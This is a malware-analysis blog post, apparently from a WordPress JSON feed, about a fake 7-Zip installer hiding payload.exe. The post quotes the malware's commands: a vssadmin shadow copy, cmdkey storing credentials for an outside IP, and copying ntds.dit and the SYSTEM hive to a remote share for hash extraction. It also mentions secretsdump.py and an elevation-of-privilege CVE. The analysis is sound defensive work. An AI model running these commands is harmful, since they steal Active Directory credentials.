{"id":883,"date":"2025-07-10T00:36:48","date_gmt":"2025-07-10T00:36:48","guid":{"rendered":"https:\/\/malwrforensics.com\/en\/?p=883"},"modified":"2025-07-10T00:41:34","modified_gmt":"2025-07-10T00:41:34","slug":"use-7-zip-to-extract-a-fake-7-zip-installer","status":"publish","type":"post","link":"https:\/\/malwrforensics.com\/en\/2025\/07\/10\/use-7-zip-to-extract-a-fake-7-zip-installer\/","title":{"rendered":"Using 7-Zip to extract a fake 7-Zip installer"},"content":{"rendered":"\n<p>I stumbled upon an interesting file on  <a href=\"https:\/\/app.any.run\/tasks\/7f03cd5b-ad02-4b3a-871f-c31ac0f5dc15\/\">Any.run<\/a>. The file in question is <a href=\"https:\/\/www.virustotal.com\/gui\/file\/17a5512e09311e10465f432e1a093cd484bbd4b63b3fb25e6fbb1861a2a3520b\">bff1fc0a497f275c6caf0d87eb680dc807639c9e<\/a>. It has the name 7z2409-x64.exe. If we dig a bit through the file, we can easily see that it&#8217;s actually a Nullsoft installer:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"917\" height=\"357\" src=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/image.png\" alt=\"\" class=\"wp-image-884\" srcset=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/image.png 917w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/image-300x117.png 300w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/image-768x299.png 768w\" sizes=\"auto, (max-width: 917px) 100vw, 917px\" \/><\/figure>\n\n\n\n<p>A quick search reveals that one way to extract the files inside is by using 7-Zip. Opening it reveals the real 7-Zip and a file called payload.exe.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"357\" height=\"87\" src=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/image-1.png\" alt=\"\" class=\"wp-image-885\" srcset=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/image-1.png 357w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/image-1-300x73.png 300w\" sizes=\"auto, (max-width: 357px) 100vw, 357px\" \/><\/figure>\n\n\n\n<p>Let&#8217;s analyze payload.exe. First thing we do is to check the strings:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"185\" src=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/strings1-1024x185.png\" alt=\"\" class=\"wp-image-886\" srcset=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/strings1-1024x185.png 1024w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/strings1-300x54.png 300w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/strings1-768x139.png 768w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/strings1.png 1332w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Definitely not what you&#8217;d expect to see in a clean file. Let&#8217;s disassemble it and see what&#8217;s going on.<\/p>\n\n\n\n<p>The WinMain function starts with a call to the <a href=\"https:\/\/learn.microsoft.com\/en-us\/cpp\/c-runtime-library\/reference\/system-wsystem?view=msvc-170\">system<\/a> API to execute the command <code>vssadmin create shadow \/for=C: &gt;nul 2&gt;&amp;1<\/code>. This creates a shadow copy of the C: drive. This is usually done to make it easier to extract sensitive files.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"687\" height=\"216\" src=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/code1.png\" alt=\"\" class=\"wp-image-887\" srcset=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/code1.png 687w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/code1-300x94.png 300w\" sizes=\"auto, (max-width: 687px) 100vw, 687px\" \/><\/figure>\n\n\n\n<p>Let&#8217;s analyze the code further:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"933\" height=\"383\" src=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/code2.png\" alt=\"\" class=\"wp-image-888\" srcset=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/code2.png 933w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/code2-300x123.png 300w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/code2-768x315.png 768w\" sizes=\"auto, (max-width: 933px) 100vw, 933px\" \/><\/figure>\n\n\n\n<p>Our assumption was correct. There are 4 more calls to the system API.<\/p>\n\n\n\n<p>The first one uses cmdkey to to store (add) a network credential in the Windows Credential Manager. The command that will be executed looks like this:<\/p>\n\n\n\n<p><code>cmdkey \/add:192.76.28.19 \/user:thr34t \/pass:MyThreatPassword123+<\/code><\/p>\n\n\n\n<p>Next, the malware tries to copy the files ntds.dit and SYSTEM to <code>\\\\192.76.29.19\\work\\DC01<\/code> and after that deletes the saved credentials.<\/p>\n\n\n\n<p>A whois 192.76.28.19 points us to a system which appears to belong to the <a href=\"https:\/\/www.ox.ac.uk\/contact-us\" data-type=\"link\" data-id=\"https:\/\/www.ox.ac.uk\/contact-us\">University of Oxford<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"431\" height=\"286\" src=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/whois_ip.png\" alt=\"\" class=\"wp-image-889\" srcset=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/whois_ip.png 431w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/whois_ip-300x199.png 300w\" sizes=\"auto, (max-width: 431px) 100vw, 431px\" \/><\/figure>\n\n\n\n<p>Let&#8217;s see what are those files good for.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>ntds.dit<\/code> is the core database file for <strong>Active Directory Domain Services (AD DS)<\/strong> in Windows Server<\/li>\n\n\n\n<li>SYSTEM is a registry hive. It can be used to decrypt the password hashes stored in ntds.dit.<\/li>\n<\/ul>\n\n\n\n<p>From here it&#8217;s relatively easy to get those hashes. One example is by using <a href=\"https:\/\/github.com\/fortra\/impacket\/blob\/master\/examples\/secretsdump.py\">secretsdump.py<\/a> from Impacket.<\/p>\n\n\n\n<p>Now, you may ask yourself how come everyone has access to these files? Well, usually regular users don&#8217;t. But that&#8217;s where <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2021-36934\">CVE-2021-36934<\/a> comes into play (or another elevation of privilege vulnerability). That&#8217;s the reason some detections on VirusTotal point have this CVE in the name.<\/p>\n\n\n\n<p>Hopefully you had fun reading this!<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>I stumbled upon an interesting file on Any.run. The file in question is bff1fc0a497f275c6caf0d87eb680dc807639c9e. It has the name 7z2409-x64.exe. If we dig a bit through the file, we can easily see that it&#8217;s actually a Nullsoft installer: A quick search reveals that one way to extract the files inside is by using 7-Zip. Opening it [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[145,146,38,148,147],"class_list":["post-883","post","type-post","status-publish","format-standard","hentry","category-security","tag-malware-analysis","tag-ntds-dit","tag-reverse-engineering","tag-secretsdump-py","tag-system-registry-hive"],"blocksy_meta":[],"featured_image_urls_v2":{"full":"","thumbnail":"","medium":"","medium_large":"","large":"","1536x1536":"","2048x2048":""},"post_excerpt_stackable_v2":"<p>I stumbled upon an interesting file on Any.run. The file in question is bff1fc0a497f275c6caf0d87eb680dc807639c9e. It has the name 7z2409-x64.exe. If we dig a bit through the file, we can easily see that it&#8217;s actually a Nullsoft installer: A quick search reveals that one way to extract the files inside is by using 7-Zip. Opening it reveals the real 7-Zip and a file called payload.exe. Let&#8217;s analyze payload.exe. First thing we do is to check the strings: Definitely not what you&#8217;d expect to see in a clean file. Let&#8217;s disassemble it and see what&#8217;s going on. The WinMain function starts with&hellip;<\/p>\n","category_list_v2":"<a href=\"https:\/\/malwrforensics.com\/en\/category\/security\/\" rel=\"category tag\">Security<\/a>","author_info_v2":{"name":"malwrforensics","url":"https:\/\/malwrforensics.com\/en\/author\/u_malwrforensics\/"},"comments_num_v2":"0 comments","_links":{"self":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts\/883","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/comments?post=883"}],"version-history":[{"count":4,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts\/883\/revisions"}],"predecessor-version":[{"id":893,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts\/883\/revisions\/893"}],"wp:attachment":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/media?parent=883"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/categories?post=883"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/tags?post=883"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}